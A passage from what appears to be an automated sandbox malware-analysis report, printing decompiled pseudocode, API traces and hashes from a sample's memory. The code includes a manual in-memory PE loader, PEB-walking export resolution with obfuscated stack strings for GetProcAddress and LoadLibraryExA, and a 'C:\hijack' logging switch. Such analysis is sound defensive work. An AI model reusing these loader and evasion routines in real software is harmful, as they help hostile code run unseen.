							 *((intOrPtr*)(E1000F780(__eflags))) = _t24;
							L19:
							 *((intOrPtr*)(E1000F780(_t37))) = _t24;
						} else {
							goto L16;
						}
					}
					return _t28;
					L16:
					_t6 = E1001092A(_t30);
					_t37 = _t6;
				} while (_t6 != 0);
				goto L19;
			}

0x1000cebd
0x1000cebe
0x1000cec6
0x1000cec8
0x1000cece
0x1000ced0
0x1000ced2
0x1000ced9
0x1000cee3
0x1000cee9
0x1000ceea
0x1000cef2
0x1000cf02
0x1000cf05
0x1000cf12
0x1000cf12
0x1000cf14
0x1000cf18
0x1000cf18
0x1000cf18
0x1000cf1c
0x1000cf1c
0x1000cf1f
0x00000000
0x1000cf07
0x1000cf07
0x1000cf08
0x1000cf0d
0x1000cf10
0x00000000
0x00000000
0x1000cf10
0x1000cef4
0x1000cef6
0x1000cefe
0x1000cefe
0x1000cef8
0x1000cef8
0x1000cef8
0x1000ceff
0x1000cf20
0x1000cf20
0x1000cf27
0x1000cf27
0x1000cf29
0x1000cf2d
0x1000cf37
0x1000cf38
0x1000cf4c
0x1000cf4e
0x1000cf53
0x00000000
0x00000000
0x00000000
0x1000cf38
0x1000cf5b
0x1000cf3a
0x1000cf3b
0x1000cf40
0x1000cf42
0x00000000

APIs

__FF_MSGBANNER.LIBCMT ref: 1000CED2

Part of subcall function 10011F42: __NMSG_WRITE.LIBCMT ref: 10011F69
Part of subcall function 10011F42: __NMSG_WRITE.LIBCMT ref: 10011F73

__NMSG_WRITE.LIBCMT ref: 1000CED9

Part of subcall function 10011DA2: _strcpy_s.LIBCMT ref: 10011E0E
Part of subcall function 10011DA2: __invoke_watson.LIBCMT ref: 10011E1F
Part of subcall function 10011DA2: GetModuleFileNameA.KERNEL32(00000000,103354E9,00000104,?,103352E0,00000000), ref: 10011E3B
Part of subcall function 10011DA2: _strcpy_s.LIBCMT ref: 10011E50
Part of subcall function 10011DA2: __invoke_watson.LIBCMT ref: 10011E63
Part of subcall function 10011DA2: _strlen.LIBCMT ref: 10011E6C
Part of subcall function 10011DA2: _strlen.LIBCMT ref: 10011E79
Part of subcall function 10011DA2: __invoke_watson.LIBCMT ref: 10011EA6

Part of subcall function 10011B04: ___crtCorExitProcess.LIBCMT ref: 10011B08
Part of subcall function 10011B04: ExitProcess.KERNEL32 ref: 10011B12

Part of subcall function 1000CE60: ___sbh_alloc_block.LIBCMT ref: 1000CE88

RtlAllocateHeap.NTDLL(00000000), ref: 1000CF27

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: __invoke_watson$ExitProcess_strcpy_s_strlen$AllocateFileHeapModuleName___crt___sbh_alloc_block
String ID:
API String ID: 3791426274-0
Opcode ID: cde093680f6c0b126d7258c0ccc5fda5382228ab6452671c1bcb805c8c46bad4
Instruction ID: e2b4030b7ffdff5dfd6972142c91b8fd57cf3792c5bc4284219116a52f4c6e3d
Opcode Fuzzy Hash: cde093680f6c0b126d7258c0ccc5fda5382228ab6452671c1bcb805c8c46bad4
Instruction Fuzzy Hash: 17012B3664936F5AF221D3699C81D7A72DDDB847F0B220036F908CA19ACA60DC419192

Uniqueness

Uniqueness Score: -1.00%

Function 1001FC70, Relevance: 4.5, APIs: 3, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001FC70(CHAR* _a4, void* _a8, long _a12) {
				void* _v8;
				long _v12;
				struct _OVERLAPPED* _v16;
				void* _t12;
				int _t14;

				_v16 = 0;
				_t12 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0x80, 0); // executed
				_v8 = _t12;
				_t14 = WriteFile(_v8, _a8, _a12,  &_v12, 0); // executed
				if(_t14 != 0) {
					_v16 = 1;
				}
				CloseHandle(_v8);
				return _v16;
			}

0x1001fc76
0x1001fc93
0x1001fc99
0x1001fcae
0x1001fcb6
0x1001fcb8
0x1001fcb8
0x1001fcc3
0x1001fccf

APIs

CreateFileA.KERNELBASE(10027948,40000000,00000000,00000000,00000002,00000080,00000000), ref: 1001FC93
WriteFile.KERNELBASE(00039E00,00000000,00000000,10027948,00000000), ref: 1001FCAE
CloseHandle.KERNEL32(00039E00), ref: 1001FCC3

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: ad2f09d0c760640d3f087f917110d740d93e78ee16150dd3c08881fe94400f9c
Instruction ID: 2f4003bc1fe89f611cd7e8d3edbfbe9cee40d04c14368eec4aa65be71e9b4f80
Opcode Fuzzy Hash: ad2f09d0c760640d3f087f917110d740d93e78ee16150dd3c08881fe94400f9c
Instruction Fuzzy Hash: 57F0BD75A40208FBEB10DFD4DD85F9E77B8EB48704F208148FA14AB280DA75AA559B94

Uniqueness

Uniqueness Score: -1.00%

Function 1001F220, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001F220() {
				int _t1;

				_t1 = PathFileExistsA("C:\\hijack"); // executed
				return _t1;
			}

0x1001f228
0x1001f22f

APIs

PathFileExistsA.KERNELBASE(C:\hijack,?,1001F242,?,10022D49,[HIJACK][%s][%s][%d]: data = %s,00000000), ref: 1001F228

Strings

C:\hijack, xrefs: 1001F223

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: ExistsFilePath
String ID: C:\hijack
API String ID: 1174141254-148195797
Opcode ID: b4aed7142bcfa9c109a42f7cfcdeef266ad65f9a5a7ad023a92b352b605b1dd6
Instruction ID: 836d1940dc60a67217bc81a4f11f7de2e89defe1122ff9dd96729f1ae93068f2
Opcode Fuzzy Hash: b4aed7142bcfa9c109a42f7cfcdeef266ad65f9a5a7ad023a92b352b605b1dd6
Instruction Fuzzy Hash: BBA022382C020CA3800023CABC088E0BB3CC8880323820020FA0C020008F0220A000A3

Uniqueness

Uniqueness Score: -1.00%

Function 00405279, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 62
memoryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00405279(void* __eax) {
				void* _t55;
				intOrPtr _t58;
				intOrPtr _t82;
				void* _t87;
				void* _t88;
				void* _t90;
				void* _t92;

				_t88 = _t87 + 1;
				0x8958a00a();
				asm("sbb [edx+0x4], ch");
				 *((intOrPtr*)(_t88 - 4)) = VirtualAlloc( *(_t88 - 0xc),  *( *((intOrPtr*)(_t88 - 0x20)) + 0x54), 0x1000, ??);
				E004053A9( *((intOrPtr*)(_t88 - 4)),  *((intOrPtr*)(_t88 - 8)),  *((intOrPtr*)( *((intOrPtr*)(_t88 - 8)) + 0x3c)) +  *( *((intOrPtr*)(_t88 - 0x20)) + 0x54));
				 *((intOrPtr*)( *((intOrPtr*)(_t88 - 0x18)))) =  *((intOrPtr*)(_t88 - 4)) +  *((intOrPtr*)( *((intOrPtr*)(_t88 - 8)) + 0x3c));
				 *( *((intOrPtr*)( *((intOrPtr*)(_t88 - 0x18)))) + 0x34) =  *(_t88 - 0xc);
				E00405599( *((intOrPtr*)(_t88 + 8)),  *((intOrPtr*)(_t88 - 0x20)),  *((intOrPtr*)(_t88 - 0x18))); // executed
				_t92 = _t90 + 0x18;
				_t82 =  *(_t88 - 0xc) -  *((intOrPtr*)( *((intOrPtr*)(_t88 - 0x20)) + 0x34));
				 *((intOrPtr*)(_t88 - 0x1c)) = _t82;
				if(_t82 != 0) {
					E00405809( *((intOrPtr*)(_t88 - 0x18)),  *((intOrPtr*)(_t88 - 0x1c)));
					_t92 = _t92 + 8;
				}
				_t55 = E004058E9( *((intOrPtr*)(_t88 - 0x18))); // executed
				if(_t55 != 0) {
					E00405699( *((intOrPtr*)(_t88 - 0x18))); // executed
					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t88 - 0x18)))) + 0x28)) == 0) {
						L8:
						_t58 =  *((intOrPtr*)(_t88 - 0x18));
					} else {
						 *((intOrPtr*)(_t88 - 0x14)) =  *(_t88 - 0xc) +  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t88 - 0x18)))) + 0x28));
						 *((intOrPtr*)(_t88 - 0x10)) =  *((intOrPtr*)(_t88 - 0x14))( *(_t88 - 0xc), 1, 0);
						if( *((intOrPtr*)(_t88 - 0x10)) != 0) {
							 *((intOrPtr*)( *((intOrPtr*)(_t88 - 0x18)) + 8)) = 1;
							goto L8;
						} else {
							goto L9;
						}
					}
				} else {
					L9:
					_t58 = 0;
				}
				return _t58;
			}

0x00405279
0x0040527a
0x00405280
0x00405296
0x004052ae
0x004052c2
0x004052cc
0x004052db
0x004052e0
0x004052e9
0x004052ec
0x004052ef
0x004052f9
0x004052fe
0x004052fe
0x00405305
0x0040530f
0x00405319
0x0040532a
0x0040535c
0x0040535c
0x0040532c
0x00405337
0x00405345
0x0040534c
0x00405355
0x00000000
0x0040534e
0x00000000
0x0040534e
0x0040534c
0x00405311
0x00405361
0x00405361
0x00405361
0x00405366

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 00405293

Part of subcall function 00405599: VirtualAlloc.KERNELBASE(00000065,00000000,00001000,00000004,?,004052E0,?,?), ref: 0040565D

Strings

mQ@, xrefs: 004052F5, 004052CF, 00405301, 004052C4, 004052BF, 004052D2, 004052F8, 00405304

Memory Dump Source

Source File: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: mQ@
API String ID: 4275171209-1781705956
Opcode ID: 9c407e420437b85d8e606006875fc3966ea18b5a4a51b90f826934547bd30036
Instruction ID: dbaf598f9aa3cdeea1fef9ad7be1053e3f902deb7a8d8a95dff736660d86b170
Opcode Fuzzy Hash: 9c407e420437b85d8e606006875fc3966ea18b5a4a51b90f826934547bd30036
Instruction Fuzzy Hash: 5921F9B5E00109AFCB44DFA9C881DAFBBB5FF8C300B108259E904A7345E679E951CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 1001F230, Relevance: 3.0, APIs: 2, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001F230(void* __edi, intOrPtr _a4, char _a8) {
				char* _v8;
				char _v70491;
				char _v70492;
				void* _t12;
				void* _t16;

				E10018B00(0x11358); // executed
				_t12 = E1001F220(); // executed
				if(_t12 != 0) {
					_v70492 = 0;
					E1000CF80(__edi,  &_v70491, 0, 0x1134f);
					_v8 =  &_a8;
					_t16 = E10001D60( &_v70492, 0x1134f, _a4, _v8);
					_v8 = 0;
					OutputDebugStringA( &_v70492);
					return _t16;
				}
				return _t12;
			}

0x1001f238
0x1001f23d
0x1001f244
0x1001f246
0x1001f25b
0x1001f266
0x1001f27d
0x1001f285
0x1001f293
0x00000000
0x1001f293
0x1001f29c

APIs

Part of subcall function 1001F220: PathFileExistsA.KERNELBASE(C:\hijack,?,1001F242,?,10022D49,[HIJACK][%s][%s][%d]: data = %s,00000000), ref: 1001F228

_memset.LIBCMT ref: 1001F25B

Part of subcall function 10001D60: __vsnprintf_s.LIBCMT ref: 10001D77

OutputDebugStringA.KERNEL32(?,?,?,?,?,10022D49,[HIJACK][%s][%s][%d]: data = %s), ref: 1001F293

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: DebugExistsFileOutputPathString__vsnprintf_s_memset
String ID:
API String ID: 3726070730-0
Opcode ID: 38a1c629065592f6bfd2de089b35504f17c640c29cbcd8feaed5eabe39e1a170
Instruction ID: 59963c058c004c355ade2e5f334ded41505970929f005b43d63a195b67db6380
Opcode Fuzzy Hash: 38a1c629065592f6bfd2de089b35504f17c640c29cbcd8feaed5eabe39e1a170
Instruction Fuzzy Hash: 6BF090B9900348A7DB14CBE5DC45FE9B37EDB04A04F4440C8FB189B649EA70E7848BA2

Uniqueness

Uniqueness Score: -1.00%

Function 1000F81F, Relevance: 3.0, APIs: 2, Instructions: 28
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000F81F(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x10335310 = _t6;
				if(_t6 != 0) {
					_t7 = E1000F7C4(__eflags);
					__eflags = _t7 - 3;
					 *0x10337f3c = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E1000FA94(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x10335310);
							 *0x10335310 =  *0x10335310 & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}

0x1000f830
0x1000f838
0x1000f83d
0x1000f842
0x1000f847
0x1000f84a
0x1000f84f
0x1000f875
0x1000f877
0x1000f878
0x1000f851
0x1000f856
0x1000f85b
0x1000f85e
0x00000000
0x1000f860
0x1000f866
0x1000f86c
0x00000000
0x1000f86c
0x1000f85e
0x1000f83f
0x1000f83f
0x1000f841
0x1000f841

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,1000EA0F,00000001), ref: 1000F830
HeapDestroy.KERNEL32 ref: 1000F866

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: Heap$CreateDestroy
String ID:
API String ID: 3296620671-0
Opcode ID: 93a6f002e55d1f2c72530dbf700ee14f565e4e658e751c809a659bb994ece646
Instruction ID: 18601b020fc9775d6ac859e2e5d9de66436f62596d67e2443513b26528c1d1d3
Opcode Fuzzy Hash: 93a6f002e55d1f2c72530dbf700ee14f565e4e658e751c809a659bb994ece646
Instruction Fuzzy Hash: 0DE06574628312ABF700EB314C897A535D8E7807D2F21483DF404C84E5FFA0C640A741

Uniqueness

Uniqueness Score: -1.00%

Function 004059E1, Relevance: 1.6, APIs: 1, Instructions: 94
libraryCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E004059E1(intOrPtr __eax) {
				struct HINSTANCE__* _t56;
				intOrPtr _t57;
				intOrPtr* _t74;
				void* _t101;

				L0:
				while(1) {
					L0:
					 *((intOrPtr*)( *((intOrPtr*)(_t101 - 0x14)))) = __eax;
					L15:
					while(1) {
						L15:
						if( *((intOrPtr*)( *((intOrPtr*)(_t101 - 0x14)))) != 0) {
							L17:
							L10:
							 *(_t101 - 0x18) =  &(( *(_t101 - 0x18))[1]);
							 *((intOrPtr*)(_t101 - 0x14)) =  *((intOrPtr*)(_t101 - 0x14)) + 4;
							L11:
							if( *( *(_t101 - 0x18)) != 0) {
								L12:
								if(( *( *(_t101 - 0x18)) & 0x80000000) == 0) {
									L14:
									 *((intOrPtr*)(_t101 - 0x20)) =  *((intOrPtr*)(_t101 - 0xc)) +  *( *(_t101 - 0x18));
									 *((intOrPtr*)( *((intOrPtr*)(_t101 - 0x14)))) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t101 + 8)) + 0x10))))( *(_t101 - 0x1c),  *((intOrPtr*)(_t101 - 0x20)) + 2);
								} else {
									L13:
									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t101 + 8)) + 0x10))))( *(_t101 - 0x1c),  *( *(_t101 - 0x18)) & 0x0000ffff);
									goto L0;
								}
								continue;
							}
						} else {
							L16:
							 *(_t101 - 8) = 0;
						}
						L18:
						if( *(_t101 - 8) != 0) {
							L20:
							L1:
							 *((intOrPtr*)(_t101 - 0x10)) =  *((intOrPtr*)(_t101 - 0x10)) + 0x14;
							L2:
							if( *((intOrPtr*)( *((intOrPtr*)(_t101 - 0x10)) + 0xc)) != 0) {
								L3:
								_t56 = LoadLibraryExA( *((intOrPtr*)(_t101 - 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t101 - 0x10)) + 0xc)), 0, 0); // executed
								 *(_t101 - 0x1c) = _t56;
								if( *(_t101 - 0x1c) != 0) {
									L5:
									_t74 =  *((intOrPtr*)(_t101 - 0x10));
									if( *_t74 == 0) {
										L7:
										_t57 =  *((intOrPtr*)(_t101 - 0x10));
										L8:
										asm("lock mov ecx, [ebp-0xc]");
										 *(_t101 - 0x18) = _t74 +  *((intOrPtr*)(_t57 + 0x10));
										 *((intOrPtr*)(_t101 - 0x14)) =  *((intOrPtr*)(_t101 - 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t101 - 0x10)) + 0x10));
									} else {
										L6:
										 *(_t101 - 0x18) =  *((intOrPtr*)(_t101 - 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t101 - 0x10))));
										 *((intOrPtr*)(_t101 - 0x14)) =  *((intOrPtr*)(_t101 - 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t101 - 0x10)) + 0x10));
									}
									L9:
									goto L11;
								} else {
									L4:
									 *(_t101 - 8) = 0;
								}
							}
						}
						L21:
						return  *(_t101 - 8);
						L22:
					}
				}
			}

0x004059e1
0x004059e1
0x004059e1
0x004059e4
0x00000000
0x00405a0b
0x00405a0b
0x00405a11
0x00405a1c
0x004059a2
0x004059a8
0x004059b1
0x004059b4
0x004059ba
0x004059bc
0x004059c7
0x004059e8
0x004059f0
0x00405a09
0x004059c9
0x004059c9
0x004059df
0x00000000
0x004059df
0x00000000
0x004059c7
0x00405a13
0x00405a13
0x00405a13
0x00405a13
0x00405a1e
0x00405a22
0x00405a26
0x00405926
0x0040592c
0x0040592f
0x00405936
0x0040593c
0x00405950
0x00405952
0x00405959
0x00405967
0x00405967
0x0040596d
0x00405988
0x00405988
0x0040598a
0x0040598a
0x00405991
0x0040599d
0x0040596f
0x0040596f
0x00405977
0x00405983
0x00405983
0x004059a0
0x00000000
0x0040595b
0x0040595b
0x0040595b
0x0040595b
0x00405959
0x00405936
0x00405a2b
0x00405a31
0x00000000
0x00405a31
0x00405a0b

APIs

LoadLibraryExA.KERNELBASE(00000000,00000000,00000000), ref: 00405950

Memory Dump Source

Source File: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b5d0f8a1bf7b2038cbd8864f2d305bb74c0e3a40d9f062a4762629741d53013d
Instruction ID: c89216279029861e0f2a02b5bb4ee4984ca54bd28e079509e5cd61ee92033d32
Opcode Fuzzy Hash: b5d0f8a1bf7b2038cbd8864f2d305bb74c0e3a40d9f062a4762629741d53013d
Instruction Fuzzy Hash: E84175B4A0060ADFDB04CF88D891BAEB7B1FF88314F248569D5157B395C734A941CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040572E, Relevance: 1.6, APIs: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(00000000,00000000,?,?), ref: 004057F8

Memory Dump Source

Source File: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1f519fc31903773714423c04ace8a92900063527f879fb85026ab8a25b2e8cca
Instruction ID: 1067a663c85961089580c26c4081082774dbeea73ac4ade2580fe47cc0d80685
Opcode Fuzzy Hash: 1f519fc31903773714423c04ace8a92900063527f879fb85026ab8a25b2e8cca
Instruction Fuzzy Hash: 0041D974A00619DFDB08CF88D590AADBBF2FB8C314F249259E50AAB394C734AD81DF54

Uniqueness

Uniqueness Score: -1.00%

Function 10019710, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10019710() {
				intOrPtr _t2;

				EnumWindows(E10019430, 0);
				_t2 =  *0x10335dcc; // 0x0
				return _t2;
			}

0x1001971a
0x10019720
0x10019726

APIs

EnumWindows.USER32(10019430,00000000), ref: 1001971A

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: a7eba7f491d23658f48507abf630147bde2ae6f3d70c73b7c6eb4142ddaa2826
Instruction ID: b52a782fc5a630541d4b441021bffe907a2dd7d3096b3a676bb7090c7594124f
Opcode Fuzzy Hash: a7eba7f491d23658f48507abf630147bde2ae6f3d70c73b7c6eb4142ddaa2826
Instruction Fuzzy Hash: 93B01230140329A7D2009795DCCAF4577BCF354A18F520001F70C4A6A2CB71B4528555

Uniqueness

Uniqueness Score: -1.00%

Function 1000EC31, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E1000EC31(void* __ebx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t5;
				void* _t13;

				E100152B4();
				_push(_a4);
				_t5 = L1000EB34(__ebx, _a12, _a8, __edi, __esi, _t13); // executed
				return _t5;
			}

0x1000ec31
0x1000ec36
0x1000ec42
0x1000ec48

APIs

___security_init_cookie.LIBCMT ref: 1000EC31

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: ___security_init_cookie
String ID:
API String ID: 3657697845-0
Opcode ID: 435c711d617b55a71fb4d1b54f090de3e7e2be7afa2c94b8a1ac53afd156608b
Instruction ID: e6deafa1040a52db75f664394f4ca8d863cdd32d4507f565b6a3541a6f58ca8f
Opcode Fuzzy Hash: 435c711d617b55a71fb4d1b54f090de3e7e2be7afa2c94b8a1ac53afd156608b
Instruction Fuzzy Hash: 88B0923A10A340EB8204CB20D482C0FB3A2EBD4311F24C90DF8A61A2558B31EC60EA52

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404E19, Relevance: 35.1, Strings: 28, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00404E19(intOrPtr* _a4, char _a8, char _a12) {
				void* _v5;
				char _v8;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v28;
				char _v32;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				intOrPtr* _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _t131;

				_v64 = 0;
				_v28 = 0;
				_v72 = 0;
				_v88 = 0;
				_v60 = 0;
				_v84 = 0;
				_v8 = 0;
				_v80 = 0;
				_v56 = 0;
				_v52 = 0;
				_v76 = 0;
				_v32 = 0;
				_v92 = 0;
				_v68 = 0;
				_v48 = 0x47;
				_v47 = 0x65;
				_v46 = 0x74;
				_v45 = 0x50;
				_v44 = 0x72;
				_v43 = 0x6f;
				_v42 = 0x63;
				_v41 = 0x41;
				_v40 = 0x64;
				_v39 = 0x64;
				_v38 = 0x72;
				_v37 = 0x65;
				_v36 = 0x73;
				_v35 = 0x73;
				_v34 = 0;
				_v24 = 0x4c;
				_v23 = 0x6f;
				_v22 = 0x61;
				_v21 = 0x64;
				_v20 = 0x4c;
				_v19 = 0x69;
				_v18 = 0x62;
				_v17 = 0x72;
				_v16 = 0x61;
				_v15 = 0x72;
				_v14 = 0x79;
				_v13 = 0x45;
				_v12 = 0x78;
				_v11 = 0x41;
				_v10 = 0;
				_v64 =  *[fs:0x30];
				_v28 =  *((intOrPtr*)(_v64 + 0xc));
				_v72 =  *((intOrPtr*)(_v28 + 0x1c));
				_v72 =  *_v72;
				_v88 =  *((intOrPtr*)(_v72 + 8));
				_v60 =  *((intOrPtr*)(_v72 + 0x20));
				 *_a4 = _v88;
				_v68 =  *((intOrPtr*)(_v88 + 0x3c));
				_v84 = _v88 +  *((intOrPtr*)(_v88 + _v68 + 0x78));
				_t131 = _v84;
				_push(_t131);
				asm("sbb [ecx+0x458bcc55], cl");
				asm("lodsb");
				_v52 = _t131 +  *0x000000A7;
				_v76 = _v88 +  *((intOrPtr*)(_v84 + 0x20));
				_v92 = _v88 +  *((intOrPtr*)(_v84 + 0x24));
				_t81 =  &_v24; // 0x4c
				_v32 = E00404FF9(_v84, _t81);
				_v8 = E00405049(_v88, _v52, _v76, _v92, _v56, _v32);
				_t90 =  &_a8; // 0x61
				 *((intOrPtr*)( *_t90)) = _v8;
				_t92 =  &_v48; // 0x47
				_v32 = E00404FF9( *_t90, _t92);
				_v80 = E00405049(_v88, _v52, _v76, _v92, _v56, _v32);
				_t101 =  &_a12; // 0x4c
				 *((intOrPtr*)( *_t101)) = _v80;
				return 1;
			}

0x00404e1f
0x00404e26
0x00404e2d
0x00404e34
0x00404e3b
0x00404e42
0x00404e49
0x00404e50
0x00404e57
0x00404e5e
0x00404e65
0x00404e6c
0x00404e73
0x00404e7a
0x00404e81
0x00404e85
0x00404e89
0x00404e8d
0x00404e91
0x00404e95
0x00404e99
0x00404e9d
0x00404ea1
0x00404ea5
0x00404ea9
